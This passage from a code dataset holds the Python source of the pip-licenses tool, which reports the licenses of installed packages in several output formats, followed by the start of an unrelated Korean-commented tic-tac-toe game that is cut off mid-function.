List, Optional, Sequence, Text\n\ntry:\n from pip._internal.utils.misc import get_installed_distributions\nexcept ImportError: # pragma: no cover\n from pip import get_installed_distributions\n\nfrom prettytable import PrettyTable\n\ntry:\n from prettytable.prettytable import ALL as RULE_ALL\n from prettytable.prettytable import FRAME as RULE_FRAME\n from prettytable.prettytable import HEADER as RULE_HEADER\n from prettytable.prettytable import NONE as RULE_NONE\n PTABLE = True\nexcept ImportError: # pragma: no cover\n from prettytable import ALL as RULE_ALL\n from prettytable import FRAME as RULE_FRAME\n from prettytable import HEADER as RULE_HEADER\n from prettytable import NONE as RULE_NONE\n PTABLE = False\n\nopen = open # allow monkey patching\n\n__pkgname__ = 'pip-licenses'\n__version__ = '3.3.0'\n__author__ = 'raimon'\n__license__ = 'MIT'\n__summary__ = ('Dump the software license list of '\n 'Python packages installed with pip.')\n__url__ = 'https://github.com/raimon49/pip-licenses'\n\n\nFIELD_NAMES = (\n 
'Name',\n 'Version',\n 'License',\n 'LicenseFile',\n 'LicenseText',\n 'NoticeFile',\n 'NoticeText',\n 'Author',\n 'Description',\n 'URL',\n)\n\n\nSUMMARY_FIELD_NAMES = (\n 'Count',\n 'License',\n)\n\n\nDEFAULT_OUTPUT_FIELDS = (\n 'Name',\n 'Version',\n)\n\n\nSUMMARY_OUTPUT_FIELDS = (\n 'Count',\n 'License',\n)\n\n\nMETADATA_KEYS = (\n 'home-page',\n 'author',\n 'license',\n 'summary',\n 'license_classifier',\n)\n\n# Mapping of FIELD_NAMES to METADATA_KEYS where they differ by more than case\nFIELDS_TO_METADATA_KEYS = {\n 'URL': 'home-page',\n 'Description': 'summary',\n 'License-Metadata': 'license',\n 'License-Classifier': 'license_classifier',\n}\n\n\nSYSTEM_PACKAGES = (\n __pkgname__,\n 'pip',\n 'PTable' if PTABLE else 'prettytable',\n 'setuptools',\n 'wheel',\n)\n\nLICENSE_UNKNOWN = 'UNKNOWN'\n\n\ndef get_packages(args: \"CustomNamespace\"):\n\n def get_pkg_included_file(pkg, file_names):\n \"\"\"\n Attempt to find the package's included file on disk and return the\n tuple (included_file_path, included_file_contents).\n \"\"\"\n included_file = LICENSE_UNKNOWN\n included_text = LICENSE_UNKNOWN\n pkg_dirname = \"{}-{}.dist-info\".format(\n pkg.project_name.replace(\"-\", \"_\"), pkg.version)\n patterns = []\n [patterns.extend(sorted(glob.glob(os.path.join(pkg.location,\n pkg_dirname,\n f))))\n for f in file_names]\n for test_file in patterns:\n if os.path.exists(test_file):\n included_file = test_file\n with open(test_file, encoding='utf-8',\n errors='backslashreplace') as included_file_handle:\n included_text = included_file_handle.read()\n break\n return (included_file, included_text)\n\n def get_pkg_info(pkg):\n (license_file, license_text) = get_pkg_included_file(\n pkg,\n ('LICENSE*', 'LICENCE*', 'COPYING*')\n )\n (notice_file, notice_text) = get_pkg_included_file(\n pkg,\n ('NOTICE*',)\n )\n pkg_info = {\n 'name': pkg.project_name,\n 'version': pkg.version,\n 'namever': str(pkg),\n 'licensefile': license_file,\n 'licensetext': license_text,\n 'noticefile': notice_file,\n 'noticetext': notice_text,\n }\n metadata = None\n if pkg.has_metadata('METADATA'):\n metadata = pkg.get_metadata('METADATA')\n\n if pkg.has_metadata('PKG-INFO') and metadata is None:\n metadata = pkg.get_metadata('PKG-INFO')\n\n if metadata is None:\n for key in METADATA_KEYS:\n pkg_info[key] = LICENSE_UNKNOWN\n\n return pkg_info\n\n feed_parser = FeedParser()\n feed_parser.feed(metadata)\n parsed_metadata = feed_parser.close()\n\n for key in METADATA_KEYS:\n pkg_info[key] = parsed_metadata.get(key, LICENSE_UNKNOWN)\n\n if metadata is not None:\n message = message_from_string(metadata)\n pkg_info['license_classifier'] = \\\n find_license_from_classifier(message)\n\n if args.filter_strings:\n for k in pkg_info:\n if isinstance(pkg_info[k], list):\n for i, item in enumerate(pkg_info[k]):\n pkg_info[k][i] = item. \\\n encode(args.filter_code_page, errors=\"ignore\"). \\\n decode(args.filter_code_page)\n else:\n pkg_info[k] = pkg_info[k]. \\\n encode(args.filter_code_page, errors=\"ignore\"). 
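`get_pkg_included_file` above works by globbing a package's `.dist-info` directory for license-like filenames and reading the first match. Condensed into a standalone helper (the arguments and example call are illustrative):

```python
# Stand-alone sketch of the dist-info scan done by get_pkg_included_file.
import glob
import os

def find_included_file(location, project_name, version, patterns):
    dist_info = "{}-{}.dist-info".format(project_name.replace("-", "_"), version)
    for pattern in patterns:
        for path in sorted(glob.glob(os.path.join(location, dist_info, pattern))):
            if os.path.exists(path):
                with open(path, encoding="utf-8", errors="backslashreplace") as fh:
                    return path, fh.read()
    return "UNKNOWN", "UNKNOWN"

# e.g. find_included_file(site_packages_dir, "requests", "2.31.0",
#                         ("LICENSE*", "LICENCE*", "COPYING*"))
```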
\\\n decode(args.filter_code_page)\n\n return pkg_info\n\n pkgs = get_installed_distributions()\n ignore_pkgs_as_lower = [pkg.lower() for pkg in args.ignore_packages]\n\n fail_on_licenses = None\n if args.fail_on:\n fail_on_licenses = args.fail_on.split(\";\")\n\n allow_only_licenses = None\n if args.allow_only:\n allow_only_licenses = args.allow_only.split(\";\")\n\n for pkg in pkgs:\n pkg_name = pkg.project_name\n\n if pkg_name.lower() in ignore_pkgs_as_lower:\n continue\n\n if not args.with_system and pkg_name in SYSTEM_PACKAGES:\n continue\n\n pkg_info = get_pkg_info(pkg)\n\n license_name = select_license_by_source(\n args.from_,\n pkg_info['license_classifier'],\n pkg_info['license'])\n\n if fail_on_licenses and license_name in fail_on_licenses:\n sys.stderr.write(\"fail-on license {} was found for package \"\n \"{}:{}\".format(\n license_name,\n pkg_info['name'],\n pkg_info['version'])\n )\n sys.exit(1)\n\n if allow_only_licenses and license_name not in allow_only_licenses:\n sys.stderr.write(\"license {} not in allow-only licenses was found\"\n \" for package {}:{}\".format(\n license_name,\n pkg_info['name'],\n pkg_info['version'])\n )\n sys.exit(1)\n\n yield pkg_info\n\n\ndef create_licenses_table(\n args: \"CustomNamespace\", output_fields=DEFAULT_OUTPUT_FIELDS):\n table = factory_styled_table_with_args(args, output_fields)\n\n for pkg in get_packages(args):\n row = []\n for field in output_fields:\n if field == 'License':\n license_str = select_license_by_source(\n args.from_, pkg['license_classifier'], pkg['license'])\n row.append(license_str)\n elif field == 'License-Classifier':\n row.append(', '.join(pkg['license_classifier'])\n or LICENSE_UNKNOWN)\n elif field.lower() in pkg:\n row.append(pkg[field.lower()])\n else:\n row.append(pkg[FIELDS_TO_METADATA_KEYS[field]])\n table.add_row(row)\n\n return table\n\n\ndef create_summary_table(args: \"CustomNamespace\"):\n counts = Counter(pkg['license'] for pkg in get_packages(args))\n\n table = factory_styled_table_with_args(args, SUMMARY_FIELD_NAMES)\n for license, count in counts.items():\n table.add_row([count, license])\n return table\n\n\nclass JsonPrettyTable(PrettyTable):\n \"\"\"PrettyTable-like class exporting to JSON\"\"\"\n\n def _format_row(self, row, options):\n resrow = {}\n for (field, value) in zip(self._field_names, row):\n if field not in options[\"fields\"]:\n continue\n\n resrow[field] = value\n\n return resrow\n\n def get_string(self, **kwargs):\n # import included here in order to limit dependencies\n # if not interested in JSON output,\n # then the dependency is not required\n import json\n\n options = self._get_options(kwargs)\n rows = self._get_rows(options)\n formatted_rows = self._format_rows(rows, options)\n\n lines = []\n for row in formatted_rows:\n lines.append(row)\n\n return json.dumps(lines, indent=2, sort_keys=True)\n\n\nclass JsonLicenseFinderTable(JsonPrettyTable):\n def _format_row(self, row, options):\n resrow = {}\n for (field, value) in zip(self._field_names, row):\n if field == 'Name':\n resrow['name'] = value\n\n if field == 'Version':\n resrow['version'] = value\n\n if field == 'License':\n resrow['licenses'] = [value]\n\n return resrow\n\n def get_string(self, **kwargs):\n # import included here in order to limit dependencies\n # if not interested in JSON output,\n # then the dependency is not required\n import json\n\n options = self._get_options(kwargs)\n rows = self._get_rows(options)\n formatted_rows = self._format_rows(rows, options)\n\n lines = []\n for row in formatted_rows:\n 
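The `--fail-on` / `--allow-only` verification above reduces to a pair of membership tests over a semicolon-separated list; in isolation:

```python
# Condensed version of the license verification in get_packages above.
import sys

def verify(license_name, pkg, fail_on=None, allow_only=None):
    fail_list = fail_on.split(";") if fail_on else None
    allow_list = allow_only.split(";") if allow_only else None
    if fail_list and license_name in fail_list:
        sys.stderr.write("fail-on license %s found for %s\n" % (license_name, pkg))
        raise SystemExit(1)
    if allow_list and license_name not in allow_list:
        sys.stderr.write("license %s not in allow-only list for %s\n" % (license_name, pkg))
        raise SystemExit(1)

verify("MIT", "example-pkg", allow_only="MIT;BSD License")  # passes silently
```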
lines.append(row)\n\n return json.dumps(lines, sort_keys=True)\n\n\nclass CSVPrettyTable(PrettyTable):\n \"\"\"PrettyTable-like class exporting to CSV\"\"\"\n\n def get_string(self, **kwargs):\n\n def esc_quotes(val):\n \"\"\"\n Meta-escaping double quotes\n https://tools.ietf.org/html/rfc4180\n \"\"\"\n try:\n return val.replace('\"', '\"\"')\n except UnicodeDecodeError: # pragma: no cover\n return val.decode('utf-8').replace('\"', '\"\"')\n except UnicodeEncodeError: # pragma: no cover\n return val.encode('unicode_escape').replace('\"', '\"\"')\n\n options = self._get_options(kwargs)\n rows = self._get_rows(options)\n formatted_rows = self._format_rows(rows, options)\n\n lines = []\n formatted_header = ','.join(['\"%s\"' % (esc_quotes(val), )\n for val in self._field_names])\n lines.append(formatted_header)\n for row in formatted_rows:\n formatted_row = ','.join(['\"%s\"' % (esc_quotes(val), )\n for val in row])\n lines.append(formatted_row)\n\n return '\\n'.join(lines)\n\n\nclass PlainVerticalTable(PrettyTable):\n \"\"\"PrettyTable for outputting to a simple non-column based style.\n\n When used with --with-license-file, this style is similar to the default\n style generated from Angular CLI's --extractLicenses flag.\n \"\"\"\n\n def get_string(self, **kwargs):\n options = self._get_options(kwargs)\n rows = self._get_rows(options)\n\n output = ''\n for row in rows:\n for v in row:\n output += '{}\\n'.format(v)\n output += '\\n'\n\n return output\n\n\ndef factory_styled_table_with_args(\n args: \"CustomNamespace\", output_fields=DEFAULT_OUTPUT_FIELDS):\n table = PrettyTable()\n table.field_names = output_fields\n table.align = 'l'\n table.border = args.format_ in (FormatArg.MARKDOWN, FormatArg.RST,\n FormatArg.CONFLUENCE, FormatArg.JSON)\n table.header = True\n\n if args.format_ == FormatArg.MARKDOWN:\n table.junction_char = '|'\n table.hrules = RULE_HEADER\n elif args.format_ == FormatArg.RST:\n table.junction_char = '+'\n table.hrules = RULE_ALL\n elif args.format_ == FormatArg.CONFLUENCE:\n table.junction_char = '|'\n table.hrules = RULE_NONE\n elif args.format_ == FormatArg.JSON:\n table = JsonPrettyTable(table.field_names)\n elif args.format_ == FormatArg.JSON_LICENSE_FINDER:\n table = JsonLicenseFinderTable(table.field_names)\n elif args.format_ == FormatArg.CSV:\n table = CSVPrettyTable(table.field_names)\n elif args.format_ == FormatArg.PLAIN_VERTICAL:\n table = PlainVerticalTable(table.field_names)\n\n return table\n\n\ndef find_license_from_classifier(message):\n licenses = []\n for k, v in message.items():\n if k == 'Classifier' and v.startswith('License'):\n license = v.split(' :: ')[-1]\n\n # Through the declaration of 'Classifier: License :: OSI Approved'\n if license != 'OSI Approved':\n licenses.append(license)\n\n return licenses\n\n\ndef select_license_by_source(from_source, license_classifier, license_meta):\n license_classifier_str = ', '.join(license_classifier) or LICENSE_UNKNOWN\n if (from_source == FromArg.CLASSIFIER or\n from_source == FromArg.MIXED and len(license_classifier) > 0):\n return license_classifier_str\n else:\n return license_meta\n\n\ndef get_output_fields(args: \"CustomNamespace\"):\n if args.summary:\n return list(SUMMARY_OUTPUT_FIELDS)\n\n output_fields = list(DEFAULT_OUTPUT_FIELDS)\n\n if args.from_ == FromArg.ALL:\n output_fields.append('License-Metadata')\n output_fields.append('License-Classifier')\n else:\n output_fields.append('License')\n\n if args.with_authors:\n output_fields.append('Author')\n\n if args.with_urls:\n 
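`esc_quotes` above applies the RFC 4180 rule by hand: a literal double quote inside a quoted field is escaped by doubling it. The standard library's `csv` module implements the same convention, which is the usual alternative to rolling it manually:

```python
# The csv module applies the RFC 4180 quote-doubling rule automatically.
import csv
import io

buf = io.StringIO()
writer = csv.writer(buf, quoting=csv.QUOTE_ALL)
writer.writerow(['pkg "name"', 'MIT'])
print(buf.getvalue().strip())  # "pkg ""name""","MIT"
```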
output_fields.append('URL')\n\n if args.with_description:\n output_fields.append('Description')\n\n if args.with_license_file:\n if not args.no_license_path:\n output_fields.append('LicenseFile')\n\n output_fields.append('LicenseText')\n\n if args.with_notice_file:\n output_fields.append('NoticeText')\n if not args.no_license_path:\n output_fields.append('NoticeFile')\n\n return output_fields\n\n\ndef get_sortby(args: \"CustomNamespace\"):\n if args.summary and args.order == OrderArg.COUNT:\n return 'Count'\n elif args.summary or args.order == OrderArg.LICENSE:\n return 'License'\n elif args.order == OrderArg.NAME:\n return 'Name'\n elif args.order == OrderArg.AUTHOR and args.with_authors:\n return 'Author'\n elif args.order == OrderArg.URL and args.with_urls:\n return 'URL'\n\n return 'Name'\n\n\ndef create_output_string(args: \"CustomNamespace\"):\n output_fields = get_output_fields(args)\n\n if args.summary:\n table = create_summary_table(args)\n else:\n table = create_licenses_table(args, output_fields)\n\n sortby = get_sortby(args)\n\n if args.format_ == FormatArg.HTML:\n return table.get_html_string(fields=output_fields, sortby=sortby)\n else:\n return table.get_string(fields=output_fields, sortby=sortby)\n\n\ndef create_warn_string(args: \"CustomNamespace\"):\n warn_messages = []\n warn = partial(output_colored, '33')\n\n if args.with_license_file and not args.format_ == FormatArg.JSON:\n message = warn(('Due to the length of these fields, this option is '\n 'best paired with --format=json.'))\n warn_messages.append(message)\n\n if args.summary and (args.with_authors or args.with_urls):\n message = warn(('When using this option, only --order=count or '\n '--order=license has an effect for the --order '\n 'option. And using --with-authors and --with-urls '\n 'will be ignored.'))\n warn_messages.append(message)\n\n return '\\n'.join(warn_messages)\n\n\nclass CustomHelpFormatter(argparse.HelpFormatter): # pragma: no cover\n def __init__(\n self, prog: Text, indent_increment: int = 2,\n max_help_position: int = 24, width: Optional[int] = None\n ) -> None:\n max_help_position = 30\n super().__init__(\n prog, indent_increment=indent_increment,\n max_help_position=max_help_position, width=width)\n\n def _format_action(self, action: argparse.Action) -> str:\n flag_indent_argument: bool = False\n text = self._expand_help(action)\n separator_pos = text[:3].find('|')\n if separator_pos != -1 and 'I' in text[:separator_pos]:\n self._indent()\n flag_indent_argument = True\n help_str = super()._format_action(action)\n if flag_indent_argument:\n self._dedent()\n return help_str\n\n def _expand_help(self, action: argparse.Action) -> str:\n if isinstance(action.default, Enum):\n default_value = enum_key_to_value(action.default)\n return self._get_help_string(action) % {'default': default_value}\n return super()._expand_help(action)\n\n def _split_lines(self, text: Text, width: int) -> List[str]:\n separator_pos = text[:3].find('|')\n if separator_pos != -1:\n flag_splitlines: bool = 'R' in text[:separator_pos]\n text = text[separator_pos + 1:]\n if flag_splitlines:\n return text.splitlines()\n return super()._split_lines(text, width)\n\n\nclass CustomNamespace(argparse.Namespace):\n from_: \"FromArg\"\n order: \"OrderArg\"\n format_: \"FormatArg\"\n summary: bool\n output_file: str\n ignore_packages: List[str]\n with_system: bool\n with_authors: bool\n with_urls: bool\n with_description: bool\n with_license_file: bool\n no_license_path: bool\n with_notice_file: bool\n filter_strings: bool\n 
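The custom help formatter above encodes per-option behaviour in a short marker prefix on the help string: `R|` preserves explicit newlines, `I|` indents the argument. A stripped-down version of the splitting rule (the whitespace split stands in for argparse's width-aware wrapping):

```python
# Reduced form of CustomHelpFormatter._split_lines above.
def split_help(text):
    sep = text[:3].find("|")
    if sep != -1:
        keep_newlines = "R" in text[:sep]
        text = text[sep + 1:]
        if keep_newlines:
            return text.splitlines()
    return text.split()  # stand-in for argparse's width-aware wrapping

print(split_help("R|line one\nline two"))  # ['line one', 'line two']
print(split_help("plain help text"))       # ['plain', 'help', 'text']
```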
filter_code_page: str\n fail_on: Optional[str]\n allow_only: Optional[str]\n\n\nclass CompatibleArgumentParser(argparse.ArgumentParser):\n def parse_args(self, args: Optional[Sequence[Text]] = None,\n namespace: CustomNamespace = None) -> CustomNamespace:\n args = super().parse_args(args, namespace)\n self._verify_args(args)\n return args\n\n def _verify_args(self, args: CustomNamespace):\n if args.with_license_file is False and (\n args.no_license_path is True or\n args.with_notice_file is True):\n self.error(\n \"'--no-license-path' and '--with-notice-file' require \"\n \"the '--with-license-file' option to be set\")\n if args.filter_strings is False and \\\n args.filter_code_page != 'latin1':\n self.error(\n \"'--filter-code-page' requires the '--filter-strings' \"\n \"option to be set\")\n try:\n codecs.lookup(args.filter_code_page)\n except LookupError:\n self.error(\n \"invalid code page '%s' given for '--filter-code-page, \"\n \"check https://docs.python.org/3/library/codecs.html\"\n \"#standard-encodings for valid code pages\"\n % args.filter_code_page)\n\n\nclass NoValueEnum(Enum):\n def __repr__(self): # pragma: no cover\n return '<%s.%s>' % (self.__class__.__name__, self.name)\n\n\nclass FromArg(NoValueEnum):\n META = M = auto()\n CLASSIFIER = C = auto()\n MIXED = MIX = auto()\n ALL = auto()\n\n\nclass OrderArg(NoValueEnum):\n COUNT = C = auto()\n LICENSE = L = auto()\n NAME = N = auto()\n AUTHOR = A = auto()\n URL = U = auto()\n\n\nclass FormatArg(NoValueEnum):\n PLAIN = P = auto()\n PLAIN_VERTICAL = auto()\n MARKDOWN = MD = M = auto()\n RST = REST = R = auto()\n CONFLUENCE = C = auto()\n HTML = H = auto()\n JSON = J = auto()\n JSON_LICENSE_FINDER = JLF = auto()\n CSV = auto()\n\n\ndef value_to_enum_key(value: str) -> str:\n return value.replace('-', '_').upper()\n\n\ndef enum_key_to_value(enum_key: Enum) -> str:\n return enum_key.name.replace('_', '-').lower()\n\n\ndef choices_from_enum(enum_cls: NoValueEnum) -> List[str]:\n return [key.replace('_', '-').lower()\n for key in enum_cls.__members__.keys()]\n\n\nMAP_DEST_TO_ENUM = {\n 'from_': FromArg,\n 'order': OrderArg,\n 'format_': FormatArg,\n}\n\n\nclass SelectAction(argparse.Action):\n def __call__(\n self, parser: argparse.ArgumentParser,\n namespace: argparse.Namespace,\n values: Text,\n option_string: Optional[Text] = None,\n ) -> None:\n enum_cls = MAP_DEST_TO_ENUM[self.dest]\n values = value_to_enum_key(values)\n setattr(namespace, self.dest, getattr(enum_cls, values))\n\n\ndef create_parser():\n parser = CompatibleArgumentParser(\n description=__summary__,\n formatter_class=CustomHelpFormatter)\n\n common_options = parser.add_argument_group('Common options')\n format_options = parser.add_argument_group('Format options')\n verify_options = parser.add_argument_group('Verify options')\n\n parser.add_argument(\n '-v', '--version',\n action='version',\n version='%(prog)s ' + __version__)\n\n common_options.add_argument(\n '--from',\n dest='from_',\n action=SelectAction, type=str,\n default=FromArg.MIXED, metavar='SOURCE',\n choices=choices_from_enum(FromArg),\n help='R|where to find license information\\n'\n '\"meta\", \"classifier, \"mixed\", \"all\"\\n'\n '(default: %(default)s)')\n common_options.add_argument(\n '-o', '--order',\n action=SelectAction, type=str,\n default=OrderArg.NAME, metavar='COL',\n choices=choices_from_enum(OrderArg),\n help='R|order by column\\n'\n '\"name\", \"license\", \"author\", \"url\"\\n'\n '(default: %(default)s)')\n common_options.add_argument(\n '-f', '--format',\n dest='format_',\n 
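`SelectAction` above maps CLI strings onto Enum members by swapping dashes for underscores and upper-casing, with `enum_key_to_value` as the inverse. The round trip in isolation (using two of the members defined above):

```python
# The dash/underscore round trip behind SelectAction and the help defaults.
from enum import Enum, auto

class FormatArg(Enum):
    MARKDOWN = auto()
    JSON_LICENSE_FINDER = auto()

def value_to_enum_key(value):
    return value.replace("-", "_").upper()

def enum_key_to_value(member):
    return member.name.replace("_", "-").lower()

member = FormatArg[value_to_enum_key("json-license-finder")]
assert member is FormatArg.JSON_LICENSE_FINDER
assert enum_key_to_value(member) == "json-license-finder"
```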
action=SelectAction, type=str,\n default=FormatArg.PLAIN, metavar='STYLE',\n choices=choices_from_enum(FormatArg),\n help='R|dump as set format style\\n'\n '\"plain\", \"plain-vertical\" \"markdown\", \"rst\", \\n'\n '\"confluence\", \"html\", \"json\", \\n'\n '\"json-license-finder\", \"csv\"\\n'\n '(default: %(default)s)')\n common_options.add_argument(\n '--summary',\n action='store_true',\n default=False,\n help='dump summary of each license')\n common_options.add_argument(\n '--output-file',\n action='store', type=str,\n help='save license list to file')\n common_options.add_argument(\n '-i', '--ignore-packages',\n action='store', type=str,\n nargs='+', metavar='PKG',\n default=[],\n help='ignore package name in dumped list')\n\n format_options.add_argument(\n '-s', '--with-system',\n action='store_true',\n default=False,\n help='dump with system packages')\n format_options.add_argument(\n '-a', '--with-authors',\n action='store_true',\n default=False,\n help='dump with package authors')\n format_options.add_argument(\n '-u', '--with-urls',\n action='store_true',\n default=False,\n help='dump with package urls')\n format_options.add_argument(\n '-d', '--with-description',\n action='store_true',\n default=False,\n help='dump with short package description')\n format_options.add_argument(\n '-l', '--with-license-file',\n action='store_true',\n default=False,\n help='dump with location of license file and '\n 'contents, most useful with JSON output')\n format_options.add_argument(\n '--no-license-path',\n action='store_true',\n default=False,\n help='I|when specified together with option -l, '\n 'suppress location of license file output')\n format_options.add_argument(\n '--with-notice-file',\n action='store_true',\n default=False,\n help='I|when specified together with option -l, '\n 'dump with location of license file and contents')\n format_options.add_argument(\n '--filter-strings',\n action=\"store_true\",\n default=False,\n help='filter input according to code page')\n format_options.add_argument(\n '--filter-code-page',\n action=\"store\", type=str,\n default=\"latin1\",\n metavar=\"CODE\",\n help='I|specify code page for filtering '\n '(default: %(default)s)')\n\n verify_options.add_argument(\n '--fail-on',\n action='store', type=str,\n default=None,\n help='fail (exit with code 1) on the first occurrence '\n 'of the licenses of the semicolon-separated list')\n verify_options.add_argument(\n '--allow-only',\n action='store', type=str,\n default=None,\n help='fail (exit with code 1) on the first occurrence '\n 'of the licenses not in the semicolon-separated list')\n\n return parser\n\n\ndef output_colored(code, text, is_bold=False):\n \"\"\"\n Create function to output with color sequence\n \"\"\"\n if is_bold:\n code = '1;%s' % code\n\n return '\\033[%sm%s\\033[0m' % (code, text)\n\n\ndef save_if_needs(output_file, output_string):\n \"\"\"\n Save to path given by args\n \"\"\"\n if output_file is None:\n return\n\n try:\n with open(output_file, 'w', encoding='utf-8') as f:\n f.write(output_string)\n sys.stdout.write('created path: ' + output_file + '\\n')\n sys.exit(0)\n except IOError:\n sys.stderr.write('check path: --output-file\\n')\n sys.exit(1)\n\n\ndef main(): # pragma: no cover\n parser = create_parser()\n args = parser.parse_args()\n\n output_string = create_output_string(args)\n\n output_file = args.output_file\n save_if_needs(output_file, output_string)\n\n print(output_string)\n warn_string = create_warn_string(args)\n if warn_string:\n print(warn_string, 
file=sys.stderr)\n\n\nif __name__ == '__main__': # pragma: no cover\n main()\n","repo_name":"roshan-ican/Alien-Invasion","sub_path":"venv/Lib/site-packages/piplicenses.py","file_name":"piplicenses.py","file_ext":"py","file_size_in_byte":25790,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"35"} +{"seq_id":"16801081716","text":"import random\n\ngameboard = [] # 게임 판\nfor i in range(9):\n gameboard.append('-') # - 로 초기화\n\nwin = 0 # 승률 체크를 위한 승리 횟수 저장\nlose = 0 # 승률 체크를 위한 패배 횟수 저장\ncal = [2, 3, 5, 7, 11, 13, 17, 19, 23]\nans = [30, 1001, 7429, 238, 627, 1495, 506, 935]\n\n\"\"\"\n기본적인 정답 체크 알고리즘\n\n\n2 3 5 \n7 11 13\n17 19 23\n\n열의 곱, 행의 곱, 대각선의 곱을 계산하여 ans 리스트에 저장\nCom와 player를 위한 변수를 하나씩 정의하여 선택한 위치의 값들의 곱을 계산\n ps) 이 계산 값들은 player_ans, com_ans 변수에 저장 되어 있음\n만약 그 곱이 ans 내부의 리스트 안의 어떤 값의 배수라면 승리!\n이는 소수의 성질을 이용한 것임\n\"\"\"\n\n\ndef intro():\n \"\"\"\n 인트로 부분\n :return: 플레이어의 마크 설정, 선공 후공은 자동 결정됨\n \"\"\"\n print('This game is Tic Tac Toe.')\n marker = input('what do you want? O or X')\n while True:\n if marker == 'O' or marker == 'X':\n break\n marker = input('what do you want? O or X')\n return marker\n\n\ndef example():\n \"\"\"\n 플레이어의 입력 위치를 알려주기 위한 예시\n :return:\n \"\"\"\n exgameboard = ['1', '2', '3', '4', '5', '6', '7', '8', '9']\n printgameboard(exgameboard)\n\n\ndef input_player(gb, player_ans):\n \"\"\"\n 플레이어의 입력을 받고, 이를 게임판에 적용\n\n :param gb: 게임판을 받기\n :param player_ans: 플레이어의 마크가 올라간 위치에 해당되는 소수들의 곱\n :return: player_ans 의 값에 새로 받은 input 값에 해당된 소수까지 곱하여 리턴\n \"\"\"\n\n num = input('표시할 위치를 입력하세요. 입력은 1~9의 정수로 이루어집니다.\\n입력 : ')\n while True:\n if num == 'LOCATION':\n example() # 입력하는 방법, 마크를 놓기 위한 입력 위치 보여주기\n if num == 'BOARD':\n printgameboard(gb) # 현재 게임판 보여주기\n if num.isdigit(): # 입력된 스트링이 숫자로 이루어져있는지 확인\n if 1 <= int(num) <= 9 and gb[int(num) - 1] == '-': # 그 수는 1에서 9사이이고, 그 수에 해당된 위치는 이미 마크가 올라간 곳이 아닌지 확인\n gb[int(num) - 1] = player # 플레이어의 마크 올리기\n player_ans *= cal[int(num) - 1] # player_ans 새로 계산\n print('')\n printgameboard(gb) # 게임판 보여주기\n return player_ans\n num = input('비어있는 공간인지, 제대로 입력했는지 확인하세요.\\n게임 판을 보려면 BOARD를, 입력 방법을 보려면 LOCATION을 입력하세요')\n\n\ndef input_COM(gb, com_ans, player_ans):\n \"\"\"\n 컴퓨터의 입력 위치를 계산 하는 함수\n :param gb: 현재 게임판\n :param com_ans: 컴퓨터의 마크가 올라간 위치에 해당되는 소수들의 곱\n :param player_ans: 플레이어의 마크가 올라간 위치에 해당되는 소수들의 곱\n :return: com_ans 의 값에 새로 받은 input 값에 해당된 소수까지 곱하여 리턴\n \"\"\"\n chk = 0 # chk는 차후 입력할 위치를 잠시 저장하는 변수임\n\n for i in range(9):\n if gb[i] == '-':\n for j in range(8):\n if not (com_ans * cal[i]) % ans[j]: # 이런 상황이면 컴퓨터의 승리\n chk = i # 따라서 이 경우를 chk 변수에 저장\n break # 찾자마자 종료\n\n if not chk: # 현재 턴에 승리가 불가능할 경우, 방어\n for i in range(9):\n if gb[i] == '-':\n for j in range(8):\n if not ((player_ans * cal[i]) % ans[j]): # 이런 상황이면 플레이어의 승리\n chk = i # 따라서 이경우를 chk 변수에 저장\n break # 찾자마자 종료\n\n if not chk: # 현재 턴에 승리, 패배 할 경우 없으면 랜덤히 값을 잡자\n while gb[chk] != '-': # 빈 곳을 찾을 때까지 계속\n chk = random.randrange(0, 9) # 0 ~ 8 까지의 값을 계속 랜덤히 입력 받기\n\n gb[chk] = com # 이렇게 계산한 값을 넣고\n print('')\n printgameboard(gb) # 게임 판 출력\n return com_ans * cal[chk] # 새로운 com_ans 리턴\n\n\ndef checkcom(com_ans):\n \"\"\"\n 컴퓨터의 승리 확인\n :param com_ans: 컴퓨터의 마크가 올라간 위치에 해당되는 소수들의 곱\n :return: 1이면 승리, 0이면 아직 확인 불가\n \"\"\"\n\n for i in range(8):\n if not (com_ans % ans[i]):\n return 1\n return 0\n\n\ndef checkplayer(player_ans):\n \"\"\"\n 플레이어의 승리 확인\n :param player_ans: 플레이어의 마크가 올라간 위치에 해당되는 소수들의 곱\n :return: 1이면 승리, 0이면 아직 확인 불가\n \"\"\"\n for i in range(8):\n if not (player_ans % ans[i]):\n return 1\n return 0\n\n\ndef 
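The win test in the tic-tac-toe record above leans on unique prime factorisation: every cell maps to a distinct prime (`cal`), every winning line to the product of its three primes (`ans`), so a player's running product is divisible by a line product exactly when all three cells of that line are theirs. A standalone check of the idea:

```python
# Verifying the prime-product win test used by checkcom/checkplayer above.
cal = [2, 3, 5, 7, 11, 13, 17, 19, 23]             # cell index -> prime
ans = [30, 1001, 7429, 238, 627, 1495, 506, 935]   # the 8 winning-line products

def wins(cells):
    product = 1
    for c in cells:
        product *= cal[c]
    return any(product % line == 0 for line in ans)

print(wins([0, 1, 2]))  # True  (top row: 2*3*5 = 30)
print(wins([0, 4, 8]))  # True  (diagonal: 2*11*23 = 506)
print(wins([0, 1, 5]))  # False (no complete line)
```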
drawcheck(gb):\n \"\"\"\n 비긴 판인지 확인\n :param gb: 현재 게임 판\n :return: 1이면 비김, 0이면 아직 확인 불가\n \"\"\"\n ch = 0\n\n for i in range(9): # 판을 돌며\n if gb[i] == '-': # - 체크\n ch += 1\n\n if not ch: # 없으면 1을 리턴\n return 1\n else: # 한 개 이상이면 0을 리턴\n return 0\n\n\ndef printgameboard(gb):\n \"\"\"\n 현재의 게임판 출력 함수\n :param gb: 현재 게임 판\n \"\"\"\n # 아름답게 보이기 위한 노력\n print('-' * 16)\n for i in range(9):\n print(' ' + gb[i] + ' ', end='')\n if i % 3 == 2:\n print('\\n' + '-' * 16)\n\n\ndef playagain():\n \"\"\"\n 한 판 더할지 결정하는 함수 (baseball 에서 살짝..)\n :return: 1또는 0으로 리턴\n \"\"\"\n a = input('Play again? Yes or No')\n while 1:\n if a == 'Yes': # Yes 에서만 1로!\n ag = 1\n break\n elif a == 'No': # No 에서만 0으로!\n ag = 0\n break\n else: # 다른 경우 다시 입력받기!\n a = input('Just say Yes or No')\n return ag\n\n\ndef maindish():\n \"\"\"\n 함수의 몸체 부분\n 게임의 운영\n :return: 누가 승리자인지 혹은 비겼는지 알 수 있는 변수\n \"\"\"\n winner = 0 # 승리자가 누구인지 확인\n com_ans = 1 # 컴퓨터의 마크가 올라간 위치에 해당되는 소수들의 곱\n player_ans = 1 # 플레이어의 마크가 올라간 위치에 해당되는 소수들의 곱\n while True:\n if player == 'O': # 컴퓨터의 